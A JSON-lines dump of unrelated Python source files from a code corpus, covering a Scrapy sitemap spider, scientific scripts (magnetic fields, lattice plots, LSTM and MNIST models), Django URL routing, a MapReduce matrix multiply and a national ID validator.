parse_cli_args\n\n\n@wtl.single_tab\ndef policy(workflow: wtl.Workflow, view: wtl.View) -> wtl.Action:\n assert workflow.duplicate_loop_idx == workflow.loop_idx\n\n # With some small probabilty, refresh instead of clicking.\n return choice(view.actions.by_type(Click)) if random() < 0.95 else view.actions.by_type(Refresh).unique()\n\n\ndef set_duplicate_loop_idx(workflow: wtl.Workflow):\n workflow.duplicate_loop_idx = workflow.loop_idx\n\n\nif __name__ == \"__main__\":\n cli_args = parse_cli_args()\n\n wf = wtl.Workflow(config=wtl.Config(cli_args.config), policy=policy, url=cli_args.url, output=cli_args.output)\n\n wf.classifiers.add(wtl.ActiveElementFilter(action=Click))\n\n wf.postload_callbacks.append(partial(set_duplicate_loop_idx, wf))\n\n wf.run()\n wf.quit()\n","sub_path":"examples/random_traversal.py","file_name":"random_traversal.py","file_ext":"py","file_size_in_byte":1842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"51852037","text":"from matplotlib import pyplot as plot\nfrom mpl_toolkits.mplot3d import Axes3D\nimport numpy as np\nfrom itertools import product\n\na = .246 # nanometers\nc = .671\n\na_1 = (3**.5/2, -.5, 0)\na_2 = (3**.5/2, .5, 0)\na_3 = (0, 0, c)\n\nbravais = np.array(list(a*np.dot(i, (a_1, a_2, a_3)) for i in product(range(5), repeat=3)))\n\nfig = plot.figure()\nax = fig.add_subplot(111, projection='3d')\nplot.axis('equal')\nax.scatter(bravais[:, 0], bravais[:, 1], bravais[:, 2])\nplot.show()","sub_path":"graphite.py","file_name":"graphite.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"609614586","text":"import scrapy\nfrom scrapy.utils.sitemap import Sitemap\nfrom scrapy.spiders.sitemap import SitemapSpider\nfrom items.UrlsItem import UrlsItem\n\n\nclass SiteMapSpider(SitemapSpider):\n name = 'sitemap'\n host = 'https://www.buildzoom.com'\n # sitemap_urls = ['https://www.buildzoom.com/sitemap.xml']\n\n def start_requests(self):\n yield scrapy.Request(url=f'{self.host}/sitemap.xml', callback=self.parse, meta={'proxy': 'http://192.168.11.82:9966'})\n\n def parse(self, response):\n response = Sitemap(response.body)\n count = 0\n for url in response:\n if url['loc'].find('contractors') + 1:\n count = count + 1\n yield scrapy.Request(url=url['loc'], callback=self.parse_contractors)\n if count == 1:\n break\n\n def parse_contractors(self, response):\n response = Sitemap(response.body)\n for url in response:\n if url['loc'] == self.host:\n continue\n yield UrlsItem(**{\n 'url': url['loc'],\n 'status': 0\n })\n\n\n# scrapy.utils.sitemap.Sitemap\n# scrapy.http.response.xml.XmlResponse\n# scrapy crawl sitemap --output=data.json -L WARNING\n","sub_path":"src/spiders/SitemapSpider.py","file_name":"SitemapSpider.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"155310614","text":"\nimport numpy as np\nmu0 = 4* np.pi*1e-7 \nfrom ifigure.interactive import figure\nnp.set_printoptions(suppress=True)\n\nimport csv\n\nwith open('/home/jaman/T-1model-data/CurrentSegments.csv') as csv_file:\n \n csv_reader=csv.reader(csv_file, delimiter=',')\n init_terminal= [row[:6] for row in csv_reader]\n\n#print(len(init_terminal))\ninit_points=np.zeros((len(init_terminal),3))\nterm_points=np.zeros((len(init_terminal),3))\n\nidx=0\n\n\n\nfor line in init_terminal:\n for i in range(3):\n init_points[idx][i]=line[i]\n\n for i in range(3,6):\n term_points[idx][i-3]=line[i]\n idx+=1\nprint('all initial points')\nprint(init_points)\nprint('all terminal points')\nprint(term_points)\n\nall_mid_points=np.zeros((len(init_terminal),3))\nall_directions=np.zeros((len(init_terminal),3))\n\n\n\nfor i in range(len(init_terminal)):\n all_mid_points[i]=(init_points[i]+term_points[i])/2.0\n all_directions[i]=term_points[i]-init_points[i]\n\nprint('all mid points=')\nprint(all_mid_points)\nprint('all direction')\nprint(all_directions)\n\nwith open('/home/jaman/T-1model-data/Vertices.csv') as csv_file:\n \n csv_reader=csv.reader(csv_file, delimiter=',')\n lines= [row[:6] for row in csv_reader]\n\n \n \ninner_points=np.zeros((len(lines),3))\nouter_points=np.zeros((len(lines),3))\n\nidx=0\nfor points in lines:\n \n for i in range(3):\n\n if i==2:\n inner_points[idx][i]=0.0120\n else:\n inner_points[idx][i]=points[i]\n\n for i in range(3,6):\n if i==5:\n outer_points[idx][i-3]=0.0120\n else:\n outer_points[idx][i-3]=points[i]\n idx+=1\n\nprint(inner_points)\n#print(outer_points)\n\nmagnetic_field=np.zeros((len(inner_points),3))\nidx=0\n\n\n\nfor r in outer_points:\n local_magnetic_field=0\n cross_prod=np.zeros(3)\n \n for i in range(len(all_mid_points)):\n r_prime=r-all_mid_points[i]\n # print('r_prime=',r_prime)\n r_prime_length=np.sqrt(r_prime[0]**2+r_prime[1]**2+r_prime[2]**2)\n \n cross_prod[0]=all_directions[i][1]*r_prime[2]-all_directions[i][2]*r_prime[1]\n cross_prod[1]=all_directions[i][2]*r_prime[0]-all_directions[i][0]*r_prime[2]\n cross_prod[2]=all_directions[i][0]*r_prime[1]-all_directions[i][1]*r_prime[0]\n \n cross_prod=cross_prod/r_prime_length**3\n \n local_magnetic_field += cross_prod\n #print('cross product=',cross_prod)\n\n magnetic_field[idx]=1000*mu0*local_magnetic_field/4.0/np.pi\n #print(magnetic_field_inner[idx])\n idx+=1 \n #print('cen_index=',idx) \n#print('magnetic_field=',magnetic_field)\nnp.save('magnetic_field_outer_ted',magnetic_field)\n\n#v=figure()\n#v.plot(magnetic_field_inner[:,2])\n\n","sub_path":"ted_data_v1.py","file_name":"ted_data_v1.py","file_ext":"py","file_size_in_byte":2650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"59625390","text":"from django.conf.urls import patterns, include, url\nfrom django.views.generic import TemplateView\nfrom django.contrib import admin\nfrom django.conf import settings\nfrom tastypie.api import Api\n\nfrom gnonsite.api.v1 import resources as v1\nfrom gnonsite.api.v2 import resources as v2\nfrom gnonsite.api.v2_1 import resources as v2_1\nfrom main import views\nfrom django.views.generic import RedirectView\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\n\n\nadmin.autodiscover()\n\n\nv1_api = Api(api_name='v1')\nv1_api.register(v1.PostResource())\nv1_api.register(v1.PersonResource())\nv1_api.register(v1.OpinionResource())\nv1_api.register(v1.PlaceResource())\nv1_api.register(v1.CommentResource())\n\n\nv2_api = Api(api_name='v2')\nv2_api.register(v2.PostResource())\nv2_api.register(v2.PersonResource())\nv2_api.register(v2.OpinionResource())\nv2_api.register(v2.PlaceResource())\nv2_api.register(v2.CommentResource())\nv2_api.register(v2.CustomAPNSDeviceAuthenticatedResource())\nv2_api.register(v2.CustomGCMDeviceAuthenticatedResource())\nv2_api.register(v2.InvitationsResource())\nv2_api.register(v2.PollsResource())\nv2_api.register(v2.ChoiceResource())\nv2_api.register(v2.VoteResource())\n\n\n# v2_1_api = Api(api_name='v2.1')\n# v2_1_api.register(v2_1.PostResource())\n# v2_1_api.register(v2_1.PersonResource())\n# v2_1_api.register(v2_1.OpinionResource())\n# v2_1_api.register(v2_1.PlaceResource())\n# v2_1_api.register(v2_1.CommentResource())\n\nimport debug_toolbar\n\nurlpatterns = patterns('',\n # url(r'^__debug__/', include(debug_toolbar.urls)),\n # url(r'^landing/$', views.LandingTemplateView.as_view(), name='landing'),\n url(r'^webapp/$', views.IndexTemplateView.as_view(), name='index'),\n url(r'^$', RedirectView.as_view(url='http://anonygo.us')),\n url(r'^FAQ/$', TemplateView.as_view(template_name='main/faq.html'), name='faq'),\n url(r'^privacy_policy/$', TemplateView.as_view(template_name='main/policy.html'), name='privacy_policy'),\n url(r'^terms_of_services/$', TemplateView.as_view(template_name='main/terms.html'), name='terms_of_services'),\n url(r'^post/(?P\\d+)/$', views.PostDetailView.as_view(), name='post_details'),\n\n url(r'report/$', views.ReportTemplateView.as_view(), name='report'),\n url(r'report.csv/$', views.ReportCSVTemplateView.as_view(), name='report_csv'),\n\n url(r'^ajax/send_sms/$', 'main.ajax.send_sms_view', name='send_sms'),\n url(r'^ajax/create_comment/$', 'main.ajax.create_comment', name='create_comment'),\n\n url(r'^admin34/', include(admin.site.urls)),\n url(r'^metrics/', include('redis_metrics.urls')),\n url(r'^A856392EAA228CA076511FB5C4E66BEF.txt$', views.TextPlainView.as_view(template_name=\"A856392EAA228CA076511FB5C4E66BEF.txt\")),\n url(r'^robots.txt$', views.TextPlainView.as_view(template_name=\"robots.txt\")),\n url(r'^sitemap.xml$', views.SiteMapView.as_view(), name='sitemap'),\n (r'^api/', include(v2_api.urls)),\n # (r'^api/', include(v2_1_api.urls)),\n url(r'^unsubscribe/(?P\\d*)-(?P.*)/$', views.unsubscribe, name=\"unsubscribe_unsubscribe\"),\n url(r'^download/$', views.download, name=\"download_download\"),\n) + staticfiles_urlpatterns()\n\nif settings.DEBUG:\n import debug_toolbar\n urlpatterns += patterns('',\n url(r'^__debug__/', include(debug_toolbar.urls)),\n )\n\nhandler500 = 'main.views.my_500_error'\nhandler400 = 'main.views.my_400_error'\n\n\n# urlpatterns += patterns('',\n# url(r'^captcha/', include('captcha.urls')),\n# )\n","sub_path":"gnonsite/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"441422861","text":"class AlgorithmKey(object):\n\n def __init__(self, BacteriaLevel: int, BacteriaID: int, AntibioticID: int):\n self.BacteriaLevel = BacteriaLevel\n self.BacteriaID = BacteriaID\n self.AntibioticID = AntibioticID\n\n def __eq__(self, other):\n if isinstance(other, self.__class__):\n return (self.BacteriaLevel == other.BacteriaLevel) and (self.BacteriaID == other.BacteriaID) and (\n self.AntibioticID == other.AntibioticID)\n else:\n return False\n\n def __hash__(self):\n \"\"\"Override hash function to match the hashed found in the C# side of the code. Not important\"\"\"\n my_hash = 11\n multiplicative_factor = 463\n\n my_hash = (my_hash * multiplicative_factor) + hash(self.BacteriaLevel)\n my_hash = (my_hash * multiplicative_factor) + hash(self.BacteriaID)\n my_hash = (my_hash * multiplicative_factor) + hash(self.AntibioticID)\n\n return my_hash\n","sub_path":"algorithm development/algorithm_run/algorithm_preferences/algorithm_key.py","file_name":"algorithm_key.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"361601342","text":"import random\nfrom string import digits\n\n\"\"\"\n۱-همه کدهای ملی ۱۰ رقمی هستند.\n۲-کدهای ملی که همه ارقام آنها مثل هم باشند معتبر نیستند.\nروش کار: دهمین رقم شماره ملی را ( از سمت چپ ) به عنوان A در نظر می گیریم.\nیک مقدار B در نظر می گیریم و آن را برابر با =\n(اولین رقم * ۱۰) + ( دومین رقم * ۹ ) + ( سومین رقم * ۸ ) + ( چهارمین رقم * ۷ ) + ( پنجمین رقم * ۶) + ( ششمین رقم * ۵ ) + ( هفتمین رقم * ۴ ) + ( هشتمین رقم * ۳ ) + ( نهمین رقم * ۲ )قرار می دهیم.\nمقدار C را برابر با = B – (B/11)*11 قرار می دهیم.\nاگر مقدار C برابر با صفر باشد و مقدار A برابر C باشد کد ملی صحیح است.\nاگر مقدار C برابر با ۱ باشد و مقدار A برابر با ۱ باشد کد ملی صحیح است.\nاگر مقدار C بزرگتر از ۱ باشد و مقدار A برابر با ۱۱ – C باشد کد ملی صحیح است.\n\"\"\"\n\nclass NationalCode:\n @staticmethod\n def is_valid(code):\n for i in code:\n if i not in digits:\n return False\n if len(code) != 10 or code in [str(i)*10 for i in range(10)]:\n return False\n numArray = [int(ch) for ch in code]\n a = numArray[9]\n b = (numArray[0] * 10) + (numArray[1] * 9) + (numArray[2] * 8) + (numArray[3] * 7) + (numArray[4] * 6) + (numArray[5] * 5) + (numArray[6] * 4) + \\\n (numArray[7] * 3) + (numArray[8] * 2)\n c = b - (b//11) * 11\n if (c == 0 and a == c) or (c == 1 and a == 1) or (c > 1 and a == abs(c - 11)):\n return True\n else:\n return False\n \n @staticmethod\n def random_m1():\n while True:\n random_code = ''\n for _ in range(10):\n random_code += random.choice(digits)\n if NationalCode.is_valid(random_code):\n return random_code\n \n @staticmethod\n def random_between_m1(num1, num2):\n while True:\n code = random.randint(num1, num2)\n if NationalCode.is_valid(str(code)):\n return code\n","sub_path":"nationalcode.py","file_name":"nationalcode.py","file_ext":"py","file_size_in_byte":2306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"641930879","text":"#problem 3.1\n__author__ = 'jamie'\n\nimport sys\nimport MapReduce\n\n# Part 1\nmr = MapReduce.MapReduce()\n\n# Part 2\ndef mapper(record):\n # 0: matrix name\n # 1: rov\n # 2: column\n # 3: value\n\n #Relation M(I, J, V) with tuples (m, i, j, v=m_ij)\n if record[0] == 'a':\n M = record[0]\n i = record[1]\n j = record[2]\n v = record[3]\n for k in range(5):\n mr.emit_intermediate((i, k), [M, j, v])\n\n #Relation N(J, K, W) with tuples (n, j, k, w=n_jk)\n if record[0] == 'b':\n N = record[0]\n j = record[1]\n k = record[2]\n w = record[3]\n for i in range(5):\n mr.emit_intermediate((i, k), [N, j, w])\n\n\n# Part 3\ndef reducer(key, values):\n # key: (i, k)\n # values: [matrix name, j, value]\n # goal find common j values for both matrices and sum the products of the values\n #mr.emit((key, values))\n M = {v[1]:v[2] for v in values if v[0] == 'a'}\n N = {v[1]:v[2] for v in values if v[0] == 'b'}\n J = set.intersection(set(M.keys()), set(N.keys()))\n total = sum([M[j] * N[j] for j in J])\n mr.emit((key[0], key[1], total))\n\n\n# Part 4\ndef main():\n if len(sys.argv) >= 2:\n data = open(sys.argv[1])\n else:\n data = \"data/matrix.json\"\n\n with open(data, 'r') as f:\n mr.execute(f, mapper, reducer)\n\n\n\nif __name__ == '__main__':\n main()\n\n\n\n","sub_path":"assignment3/multiply.py","file_name":"multiply.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"50715378","text":"\nfrom pandas import read_csv\nfrom datetime import datetime\n# load data\n#def parse(x):\n#\treturn datetime.strptime(x, '%Y %m %d %H')\n\ndataset = read_csv('simulator.ver1.csv', index_col=-1)\n\nfrom math import sqrt\nfrom numpy import concatenate\nfrom matplotlib import pyplot\nfrom pandas import read_csv\nfrom pandas import DataFrame\nfrom pandas import concat\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.metrics import mean_squared_error\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import LSTM\n\n# load dataset\ndataset = read_csv('simulator.ver1.csv', header=0)\nvalues = dataset.values\n# ensure all data is float\nvalues = values.astype('float32')\n# normalize features\nscaler = MinMaxScaler(feature_range=(0, 1))\nscaled = scaler.fit_transform(values)\n\n# split into train and test sets\nn = scaled.shape[0]\nprint(n, type(n), scaled.shape)\ntrain = scaled[:int(n*0.9), :]\ntest = scaled[int(n*0.9):, :]\n# split into input and outputs\ntrain_X, train_y = train[:, :-2], train[:, -2:]\ntest_X, test_y = test[:, :-2], test[:, -2:]\n# reshape input to be 3D [samples, timesteps, features]\ntrain_X = train_X.reshape((train_X.shape[0], 1, train_X.shape[1]))\ntest_X = test_X.reshape((test_X.shape[0], 1, test_X.shape[1]))\n\nmodel = Sequential()\nmodel.add(LSTM(train_X.shape[2], input_shape=(train_X.shape[1], train_X.shape[2])))\nmodel.add(Dense(2))\nmodel.compile(loss='mae', optimizer='adam')\n\n# fit network\nhistory = model.fit(train_X, train_y, epochs=300, batch_size=72, validation_data=(test_X, test_y), verbose=2, shuffle=False)\n\n# plot history\npyplot.plot(history.history['loss'], label='train')\npyplot.plot(history.history['val_loss'], label='test')\npyplot.legend()\npyplot.show()\n\n# make a prediction\nyhat = model.predict(test_X)\n\n# Graph 1\npyplot.title(\"Prediction y1\")\npyplot.plot(yhat[:, 0], 'red', label='y1 predict rain')\npyplot.plot(test_y[:, 0], 'blue', label='y1 test rain')\npyplot.legend()\npyplot.show()\n# Graph 2\npyplot.title(\"Prediction y2\")\npyplot.plot(yhat[:, 1], 'red', label='y2 predict cloud')\npyplot.plot(test_y[:, 1], 'blue', label='y2 test cloud')\npyplot.legend()\npyplot.show()\n\ntest_X = test_X.reshape((test_X.shape[0], test_X.shape[2]))\n#train_X = train_X.reshape((train_X.shape[0], train_X.shape[2]))\n\n# invert scaling for forecast\ninv_yhat = concatenate((yhat, test_X[:, :]), axis=1)\n#print(inv_yhat.shape)\n#print(train_X.shape, train_y.shape, test_X.shape, test_y.shape)\n\n#inv_yhat = inv_yhat.reshape((inv_yhat.shape[0], inv_yhat.shape[2]))\n#print(inv_yhat.shape)\ninv_yhat = scaler.inverse_transform(inv_yhat)\ninv_yhat = inv_yhat[:,0]\n# invert scaling for actual\ntest_y = test_y.reshape((len(test_y), 2))\ninv_y = concatenate((test_y, test_X[:, :]), axis=1)\n\n\ninv_y = scaler.inverse_transform(inv_y)\ninv_y = inv_y[:,0]\n# calculate RMSE\nrmse = sqrt(mean_squared_error(inv_y, inv_yhat))\nprint('***Test RMSE: %.3f***' % rmse)\n\n","sub_path":".ipynb_checkpoints/lstm-checkpoint.py","file_name":"lstm-checkpoint.py","file_ext":"py","file_size_in_byte":2932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"148652328","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Feb 21 16:16:44 2020\n\n@author: Knaak001\n\"\"\"\n\nimport os\nimport geopandas as gpd\nimport pandas as pd\nimport numpy as np\nfrom shapely.geometry import Point\nfrom shapely.geometry import box\nfrom tqdm import tqdm\ntqdm.pandas()\n\ndef thickness_sand_layers(df):\n \"\"\"\n Determine the thickness of sand layers and label all layers with a \n unique ID in a dataframe of a core\n\n Parameters\n ----------\n df: DataFrame\n Pandas DataFrame of the core \n\n Returns\n -------\n core: DataFrame\n Pandas DataFrame of the core\n \"\"\"\n core = df.copy()\n ## create column of 0/1 for nosand/sand\n core['sand'] = None\n core.loc[core['textuur'].str[0]=='z', 'sand'] = 1\n core['sand'] = core['sand'].fillna(0)\n\n ## give ID to consecutive sand layers\n core['layer_ID'] = (core['sand'] != core['sand'].shift(1)).cumsum()\n \n ## calculate difference between the layers to determine the amount of layers of 10cm\n diff_layers = np.diff(core.diepte)\n factor = np.insert(diff_layers, 0, core.diepte.iloc[0])/10\n core['factor'] = factor.astype(int)\n factor_len = core['factor'].sum() # number of 10cm layers in core\n \n ## determine top of each layer\n core['top'] = core['diepte']-(factor*10)\n core['top'] = core['top'].astype(int)\n \n core = core.loc[np.repeat(core.index.values, core.factor)]\n core['new_depth'] = [i for i in range(core['top'].iloc[0]+10,\n core['top'].iloc[0]+\\\n (factor_len.sum()*10)+1, 10)]\n \n ## determine the thickness of all layers\n thickness = core.groupby('layer_ID')['new_depth'].\\\n apply(lambda x: x.max()-x.min()+10).\\\n reset_index(name='thickness')\n \n ## add thickness to core as new column\n core = pd.merge(core, thickness, on='layer_ID', how='left')\n \n ## create good output\n outcols = ['top', 'thickness', 'text', 'm50', 'sand', 'layer_ID']\n core = core.drop_duplicates(subset=['layer_ID', 'm50'])\n core['text'] = np.where(core.sand==1, 'Sand', 'Other')\n core = core[outcols]\n core = core.sort_values(by='top')\n \n return core\n\nclass ReadLLG:\n \"\"\"\n Class to read and interpet LLG data, consists of \"Hoofd\" and \"Data\"\n tables. \"Hoofd\" table is opened as a GeoDataFrame and \"Data\" table\n is opened as a DataFrame.\n \"\"\"\n def __init__(self, path):\n self.path = path\n self.readHoofd()\n self.readData()\n \n def readHoofd(self):\n hoofd = os.path.join(self.path, 'llg_hoofd.txt')\n dtypes = {'GWT':str} # GWT column has variable datatypes \n self.hoofd = pd.read_csv(hoofd, dtype=dtypes)\n self.hoofd.columns = map(str.lower, self.hoofd.columns)\n self.hoofd['geometry'] = [Point(x, y) for x, y in\n zip(self.hoofd['xco'], self.hoofd['yco'])]\n \n self.hoofd = gpd.GeoDataFrame(self.hoofd, geometry='geometry')\n \n def readData(self):\n data = os.path.join(self.path, 'llg_data.txt')\n dtypes = {'RE':str, 'OG':str, 'CA':str, 'M':str, 'STRAT':str}\n self.data = pd.read_csv(data, dtype=dtypes)\n self.data.columns = map(str.lower, self.data.columns)\n \n def select_core_hoofd(self, core_ID):\n \"\"\"Select data for one or more specific cores\n core_ID: array_like\n Array or list of IDs of the cores to select\n \"\"\"\n core = self.hoofd.loc[self.hoofd['boorp'].isin(core_ID)]\n return core\n \n def select_core_data(self, core_ID):\n \"\"\"Select data for one or more specific cores\n core_ID: array_like\n Array or list of IDs of the cores to select\n \"\"\"\n core = self.data.loc[self.data['boorp'].isin(core_ID)]\n return core\n \n def select_with_polygon(self, polygon):\n \"\"\" Mask DataFrame with a polygon\n polygon: Shapely Polygon or MultiPolygon object\n \"\"\"\n to_mask = gpd.GeoDataFrame(geometry=[polygon])\n masked = gpd.sjoin(self.hoofd, to_mask, how='inner', op='within')\n \n data = self.data.loc[self.data['boorp'].isin(masked.boorp.unique())]\n return data\n \n def sand_layers(self):\n \"\"\"Return LLG data table grouped as sand layers with an ID and\n corresponding thickness\n \"\"\"\n layered = self.data.groupby('boorp').\\\n progress_apply(thickness_sand_layers)\n return layered\n \n\n\n","sub_path":"scripts/llg_reader.py","file_name":"llg_reader.py","file_ext":"py","file_size_in_byte":4506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"381166421","text":"# The MIT License (MIT)\n#\n# Copyright (c) 2015, Nicolas Sebrecht & contributors\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n\"\"\"\n\nDefine runners for the workers.\n\n\"\"\"\n\nimport traceback\n\nfrom ..constants import WRK\n\n\ndef ConsumerRunner(runner, ui, workerName, tasks, emitter):\n try:\n while True:\n try:\n task = tasks.getTask()\n if task is None: # No more task.\n break # Quit the consumer loop.\n\n runner.consume(task)\n ui.debugC(WRK, \"got task %s\"% task)\n\n except KeyboardInterrupt:\n raise\n\n # Handle exceptions we can safely ignore.\n except Exception as e:\n ui.error('%s exception occured: %s\\n%s',\n workerName, e, traceback.format_exc())\n raise\n\n emitter.stopServing()\n ui.debugC(WRK, \"runner ended\")\n except Exception as e:\n ui.critical(\"%s got Exception\", workerName)\n emitter.unkownInterruptionError(str(e))\n","sub_path":"imapfw/runners/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"469079005","text":"from sys import stdout\n\nfrom mnist import MNIST\nimport math\n\nfrom cnn import CNN\n\nmnist = MNIST('Handwritten Training Sets/')\ntrainingImages, trainingLabelsPreFormat = mnist.load_training()\n\ndef printImage(image):\n\tpixelIndex = 0\n\tfor i in range(28):\n\t\tstdout.write(\"\\n\")\n\t\tfor j in range(28):\n\t\t\tif image[pixelIndex] > 0:\n\t\t\t\tstdout.write(\"###\")\n\t\t\telse:\n\t\t\t\tstdout.write(\". \")\n\t\t\tpixelIndex += 1\n\nfor i in range(len(trainingImages)):\n\tfor j in range(len(trainingImages[i])):\n\t\ttrainingImages[i][j] = float(trainingImages[i][j])/255\n\ntrainingLabels = []\nfor i in range(len(trainingLabelsPreFormat)):\n\tlabel = [0.0]*10\n\tlabel[trainingLabelsPreFormat[i]] = 1.0\n\ttrainingLabels.append(label)\n\ndef relu(x):\n\treturn max(0.0, x)\n\n\ndef reluDerivative(x):\n\tif x < 0:\n\t\treturn 0.0\n\telse:\n\t\treturn 1.0\n\n\ndef sigmoid(x):\n\ttry:\n\t\treturn 1.0/(1.0 + math.pow(math.e, -x))\n\texcept:\n\t\tif x < 0:\n\t\t\treturn 0.0\n\t\telse:\n\t\t\treturn 1.0\n\n\ndef sigmoidDerivative(x):\n\ttry:\n\t\treturn math.pow(math.e, -x)/math.pow(1 + math.pow(math.e, -x), 2)\n\texcept:\n\t\treturn 0.0\n\n\ndef tanh(x):\n\ttry:\n\t\treturn 2.0/(1 + math.pow(math.e, -2.0*x)) - 1\n\texcept:\n\t\tif x < 0:\n\t\t\treturn -1.0\n\t\telse:\n\t\t\treturn 1.0\n\n\ndef tanhDerivative(x):\n\ttry:\n\t\treturn (4.0*math.pow(math.e, -2.0*x))/math.pow(math.pow(math.e, -2.0*x) + 1, 2)\n\texcept:\n\t\treturn 0.0\n\n\ndef swish(x):\n\ttry:\n\t\treturn x/(1.0 + math.pow(math.e, -x))\n\texcept:\n\t\tif x < 0:\n\t\t\treturn 0.0\n\t\telse:\n\t\t\treturn x\n\n\ndef swishDerivative(x):\n\ttry:\n\t\treturn (1.0 + math.pow(math.e, -x)*(1.0 + x))/math.pow(1.0 + math.pow(math.e, -x), 2)\n\texcept:\n\t\tif x < 0:\n\t\t\treturn 0.0\n\t\telse:\n\t\t\treturn 1.0\n\ndef softPlus(x):\n\ttry:\n\t\treturn math.log(1 + math.pow(math.e, x), math.e)\n\texcept:\n\t\tif x < 0:\n\t\t\treturn 0\n\t\telse:\n\t\t\treturn x\n\ndef softPlusDerivative(x):\n\ttry:\n\t\treturn 1/(1 + math.pow(math.e, -x))\n\texcept:\n\t\tif x < 0:\n\t\t\treturn 0\n\t\telse:\n\t\t\treturn 1\n\ndef elu(x):\n\ta = 0.1\n\ttry:\n\t\tif x < 0:\n\t\t\treturn a*(math.pow(math.e, x) - 1)\n\t\telse:\n\t\t\treturn x\n\texcept:\n\t\tif x < 0:\n\t\t\treturn -a\n\t\telse:\n\t\t\treturn x\n\ndef eluDerivative(x):\n\ta = 0.1\n\ttry:\n\t\tif x < 0:\n\t\t\treturn a*(math.pow(math.e, x) - 1) + a\n\t\telse:\n\t\t\treturn 1\n\texcept:\n\t\tif x < 0:\n\t\t\treturn 0\n\t\telse:\n\t\t\treturn 1\n\ndef prelu(x):\n\ta = 0.1\n\ttry:\n\t\tif x < 0:\n\t\t\treturn a*x\n\t\telse:\n\t\t\treturn x\n\texcept:\n\t\tif x < 0:\n\t\t\treturn a*x\n\t\telse:\n\t\t\treturn x\n\ndef preluDerivative(x):\n\ta = 0.1\n\ttry:\n\t\tif x < 0:\n\t\t\treturn a\n\t\telse:\n\t\t\treturn 1\n\texcept:\n\t\tif x < 0:\n\t\t\treturn a\n\t\telse:\n\t\t\treturn 1\n\ncnn_p = CNN.from_file('cnn.pickle')\nprintImage(trainingImages[7])\ncomputeValue = cnn_p.compute(trainingImages[7])\nprint(computeValue)\n\ncnn = CNN(784, 10, 0.01, swish, swishDerivative)\n# cnn.insert_layer(-1, 1024)\n# cnn.insert_layer(-1, 512)\n# cnn.insert_layer(-1, 256)\n# cnn.insert_layer(-1, 128)\n# cnn.insert_layer(-1, 64)\n# cnn.insert_layer(-1, 32)\ncnn.insert_layer(-1, 16)\ncnn.insert_layer(-1, 16)\ncnn.set_layer_activation_function(-1, \"softmax\", \"softmaxDerivative\")\n# cnn.set_layer_activation_function(-1, sigmoid, sigmoidDerivative)\nprint(cnn)\n\nstdout.write(\"Training...\\n\")\nfor i in range(len(trainingImages)):\n\tstdout.write(\"\\r\" + str(i + 1) + \"/\" + str(len(trainingImages)))\n\tcnn.train(trainingImages[i], trainingLabels[i])\n\nprintImage(trainingImages[7])\ncomputeValue = cnn.compute(trainingImages[7])\nprint(computeValue)\nprint(computeValue.index(max(computeValue)))\nprint(min(range(len(computeValue)), key=computeValue.__getitem__))\nprintImage(trainingImages[8])\ncomputeValue = cnn.compute(trainingImages[8])\nprint(computeValue)\nprint(computeValue.index(max(computeValue)))\nprint(min(range(len(computeValue)), key=computeValue.__getitem__))\nprintImage(trainingImages[9])\ncomputeValue = cnn.compute(trainingImages[9])\nprint(computeValue)\nprint(computeValue.index(max(computeValue)))\nprint(min(range(len(computeValue)), key=computeValue.__getitem__))\n\ncnn.save('cnn')\n\ndef getAccuracy(nn):\n\ttestingImages, testingLabelsPreFormat = mnist.load_testing()\n\tfor i in range(len(testingImages)):\n\t\tfor j in range(len(testingImages[i])):\n\t\t\ttestingImages[i][j] = float(testingImages[i][j])/255\n\tnumberCorrect = 0\n\tfor i in range(len(testingImages)):\n\t\tprediction = nn.compute(testingImages[i])\n\t\tif prediction.index(max(prediction)) == testingLabelsPreFormat[i]:\n\t\t\tnumberCorrect += 1\n\treturn 